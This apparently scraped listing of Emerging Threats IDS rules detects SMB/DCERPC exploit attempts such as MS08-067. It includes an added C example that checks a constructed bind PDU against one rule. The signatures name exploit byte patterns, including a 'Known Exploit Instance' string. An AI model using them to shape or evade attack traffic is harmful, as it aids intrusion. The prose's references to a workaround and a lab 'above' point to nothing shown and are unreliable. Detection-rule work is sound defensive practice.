#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"ET NETBIOS SMB DCERPC PnP bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,^,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00 05 00 0B|"; within:10; distance:4; byte_test:1,&,16,1,relative; content:"|40 4E 9F 8D 3D A0 CE 11 8F 69 08 00 3E 30 05 1B|"; flowbits:set,netbios.pnp.bind.attempt; flowbits:noalert; reference:url,doc.emergingthreats.net/bin/view/Main/2002202; classtype:protocol-command-decode; sid:2002202; rev:4; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : SMB DCERPC PnP bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : url,doc.emergingthreats.net/bin/view/Main/2002202

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2002203

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"ET NETBIOS SMB DCERPC PnP QueryResConfList exploit attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,^,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00 05 00 00|"; within:10; distance:4; nocase; content:"|36 00|"; within:2; distance:19; pcre:"/(\x00\x00.*?){2}\x00{2}\xFF{2}.{128,}[\x04-\xFF][\x00-\xFF]{3}\x00{4}$/Rs"; flowbits:isset,netbios.pnp.bind.attempt; reference:cve,CAN-2005-1983; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; reference:url,doc.emergingthreats.net/bin/view/Main/2002203; classtype:attempted-admin; sid:2002203; rev:4; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : SMB DCERPC PnP QueryResConfList exploit attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,CAN-2005-1983|url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx|url,doc.emergingthreats.net/bin/view/Main/2002203

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2003081

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"ET NETBIOS NETBIOS SMB DCERPC NetrpPathCanonicalize request (possible MS06-040)"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB|25|"; depth:5; offset:4; nocase; byte_test:2,^,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00 05 00|"; within:9; distance:4; content:"|1f 00|"; distance:20; within:2; reference:url,www.microsoft.com/technet/security/bulletin/MS06-040.mspx; reference:url,doc.emergingthreats.net/bin/view/Main/2003081; classtype:misc-attack; sid:2003081; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : NETBIOS SMB DCERPC NetrpPathCanonicalize request (possible MS06-040)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-attack

URL reference : url,www.microsoft.com/technet/security/bulletin/MS06-040.mspx|url,doc.emergingthreats.net/bin/view/Main/2003081

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2003082

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS NETBIOS SMB-DS DCERPC NetrpPathCanonicalize request (possible MS06-040)"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB|25|"; depth:5; offset:4; nocase; byte_test:2,^,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00 05 00|"; within:9; distance:4; content:"|1f 00|"; distance:20; within:2; reference:url,www.microsoft.com/technet/security/bulletin/MS06-040.mspx; reference:url,doc.emergingthreats.net/bin/view/Main/2003082; classtype:misc-attack; sid:2003082; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : NETBIOS SMB-DS DCERPC NetrpPathCanonicalize request (possible MS06-040)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-attack

URL reference : url,www.microsoft.com/technet/security/bulletin/MS06-040.mspx|url,doc.emergingthreats.net/bin/view/Main/2003082

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008690

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (1)"; content:"|0B|"; offset:2; depth:1; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008690; classtype:attempted-admin; sid:2008690; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (1)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008690

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined
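The 16-byte content in rule 2008690 above is the UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188 from the netsh rpc filter workaround earlier on this page, as it appears in a DCE/RPC bind PDU: the little-endian NDR data representation swaps the bytes of the first three fields and leaves the remaining eight as written. The following C code is an added example written for this page (not Emerging Threats or Microsoft code). It converts a textual UUID to that wire form and applies the rule's two checks, packet type 0x0B (bind) at byte 2 and the presence of the interface UUID anywhere in the PDU, to a hand-constructed 72-byte bind PDU. The sample PDU is constructed, not captured, and the Computer Browser interface UUID is used only as a different interface for the negative case.

```c
/* Added example for this page: map a textual interface UUID to the bytes a
 * little-endian DCE/RPC PDU carries and apply the checks of ET sid 2008690.
 * Not code from Emerging Threats or Microsoft; the sample PDU is constructed. */
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum { DCERPC_PTYPE_REQUEST = 0x00, DCERPC_PTYPE_BIND = 0x0B };

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx" -> 16 wire bytes: time_low, time_mid
 * and time_hi_and_version are little-endian, the last 8 bytes keep text order.
 * Returns 0 on success, -1 if the text is malformed. */
int uuid_to_wire(const char *text, uint8_t out[16])
{
    uint8_t be[16];
    size_t ti, bi = 0;
    if (strlen(text) != 36) return -1;
    for (ti = 0; ti < 36; ti++) {
        if (ti == 8 || ti == 13 || ti == 18 || ti == 23) {
            if (text[ti] != '-') return -1;
            continue;
        }
        int hi = hexval((unsigned char)text[ti]);
        int lo = hexval((unsigned char)text[ti + 1]);
        if (hi < 0 || lo < 0 || bi >= 16) return -1;
        be[bi++] = (uint8_t)((hi << 4) | lo);
        ti++;                                     /* consumed two characters */
    }
    if (bi != 16) return -1;
    out[0] = be[3]; out[1] = be[2]; out[2] = be[1]; out[3] = be[0];
    out[4] = be[5]; out[5] = be[4];
    out[6] = be[7]; out[7] = be[6];
    memcpy(out + 8, be + 8, 8);
    return 0;
}

/* The rule's logic: byte 2 of the PDU is the packet type (0x0B = bind) and the
 * interface UUID appears in the PDU. Returns 1 for a bind to uuid_text. */
int dcerpc_bind_targets(const uint8_t *pdu, size_t len, const char *uuid_text)
{
    uint8_t wire[16];
    if (len < 3 || pdu[2] != DCERPC_PTYPE_BIND) return 0;
    if (uuid_to_wire(uuid_text, wire) != 0) return 0;
    for (size_t i = 0; i + 16 <= len; i++)
        if (memcmp(pdu + i, wire, 16) == 0) return 1;
    return 0;
}

/* Constructed 72-byte DCE/RPC bind (v5.0, little-endian NDR) for SRVSVC v3.0
 * over the NDR transfer syntax 8a885d04-1ceb-11c9-9fe8-08002b104860. */
static const uint8_t sample_bind_srvsvc[] = {
    0x05, 0x00, 0x0B, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
    0xB8, 0x10, 0xB8, 0x10, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
    0xC8, 0x4F, 0x32, 0x4B, 0x70, 0x16, 0xD3, 0x01, 0x12, 0x78, 0x5A, 0x47, 0xBF, 0x6E, 0xE1, 0x88,
    0x03, 0x00, 0x00, 0x00,
    0x04, 0x5D, 0x88, 0x8A, 0xEB, 0x1C, 0xC9, 0x11, 0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00
};

#define SRVSVC_UUID  "4b324fc8-1670-01d3-1278-5a47bf6ee188"   /* from the netsh filter above */
#define BROWSER_UUID "6bffd098-a112-3610-9833-012892020162"   /* Computer Browser interface */

int srvsvc_uuid_matches_rule_content(void)   /* 1: wire form equals sid 2008690's content bytes */
{
    static const uint8_t rule_content[16] = { 0xC8, 0x4F, 0x32, 0x4B, 0x70, 0x16, 0xD3, 0x01,
                                              0x12, 0x78, 0x5A, 0x47, 0xBF, 0x6E, 0xE1, 0x88 };
    uint8_t wire[16];
    return uuid_to_wire(SRVSVC_UUID, wire) == 0 && memcmp(wire, rule_content, 16) == 0;
}

int sample_bind_flags_srvsvc(void)           /* 1: the constructed bind is flagged */
{
    return dcerpc_bind_targets(sample_bind_srvsvc, sizeof sample_bind_srvsvc, SRVSVC_UUID);
}

int sample_bind_ignores_browser(void)        /* 0: same PDU, different interface */
{
    return dcerpc_bind_targets(sample_bind_srvsvc, sizeof sample_bind_srvsvc, BROWSER_UUID);
}

int request_pdu_not_flagged(void)            /* 0: same bytes with ptype = request */
{
    uint8_t pdu[sizeof sample_bind_srvsvc];
    memcpy(pdu, sample_bind_srvsvc, sizeof pdu);
    pdu[2] = DCERPC_PTYPE_REQUEST;
    return dcerpc_bind_targets(pdu, sizeof pdu, SRVSVC_UUID);
}

int malformed_uuid_rejected(void)            /* 1: a hyphen in the wrong place is refused */
{
    uint8_t wire[16];
    return uuid_to_wire("4b324fc8-1670-01d3-12785a47bf6ee188-", wire) == -1;
}
```

Note that the rule, like this check, only proves that a client bound to the SRVSVC interface, which every legitimate file-sharing client also does; the sids 2008691 onwards add the "..\" path patterns that distinguish an MS08-067 canonicalization attack from ordinary use, which is why the lab above fired sid 2008705 rather than 2008690.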

2008691

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (2)"; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"..|5C|..|5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008691; classtype:attempted-admin; sid:2008691; rev:6; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (2)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008691

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008692

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (3)"; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"../../"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008692; classtype:attempted-admin; sid:2008692; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (3)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008692

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008693

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (4)"; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 2F 00 2E 00 2E 00 2F|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008693; classtype:attempted-admin; sid:2008693; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (4)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008693

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008694

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5)"; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 5C 00 2E 00 2E 00 5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008694; classtype:attempted-admin; sid:2008694; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (5)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008694

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008696

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (7)"; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"..|5C|..|5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008696; classtype:attempted-admin; sid:2008696; rev:6; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (7)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008696

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008697

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (8)"; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"../../"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008697; classtype:attempted-admin; sid:2008697; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (8)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008697

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008698

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9)"; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 2F 00 2E 00 2E 00 2F|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008698; classtype:attempted-admin; sid:2008698; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (9)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008698

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008699

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (10)"; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 5C 00 2E 00 2E 00 5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008699; classtype:attempted-admin; sid:2008699; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (10)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008699

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008700

alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance"; content:"|00 2e 00 2e 00 2f 00 2e 00 2e 00 2f 00 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 87|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008700; classtype:attempted-admin; sid:2008700; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 — Known Exploit Instance

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008700

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008701

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11)"; flow:established,to_server; content:"|0B|"; offset:2; depth:1; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008701; classtype:attempted-admin; sid:2008701; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (11)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008701

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008702

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|5C|..|5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008702; classtype:attempted-admin; sid:2008702; rev:6; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (12)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008702

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008703

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (13)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"/../"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008703; classtype:attempted-admin; sid:2008703; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (13)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008703

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008704

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 2F 00 2E 00 2E 00 2F|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008704; classtype:attempted-admin; sid:2008704; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (14)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008704

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008705

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 5C 00 2E 00 2E 00 5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008705; classtype:attempted-admin; sid:2008705; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (15)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008705

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008706

alert tcp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (16)"; flow:established,to_server; content:"|0B|"; offset:2; depth:1; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008706; classtype:attempted-admin; sid:2008706; rev:5; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (16)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx|cve,2008-4250|url,www.kb.cert.org/vuls/id/827267|url,doc.emergingthreats.net/bin/view/Main/2008706

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2008707

alert tcp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (17)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"..|5C|..|5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; reference:url,doc.emergingthreats.net/bin/view/Main/2008707; classtype:attempted-admin; sid:2008707; rev:6; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (17)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

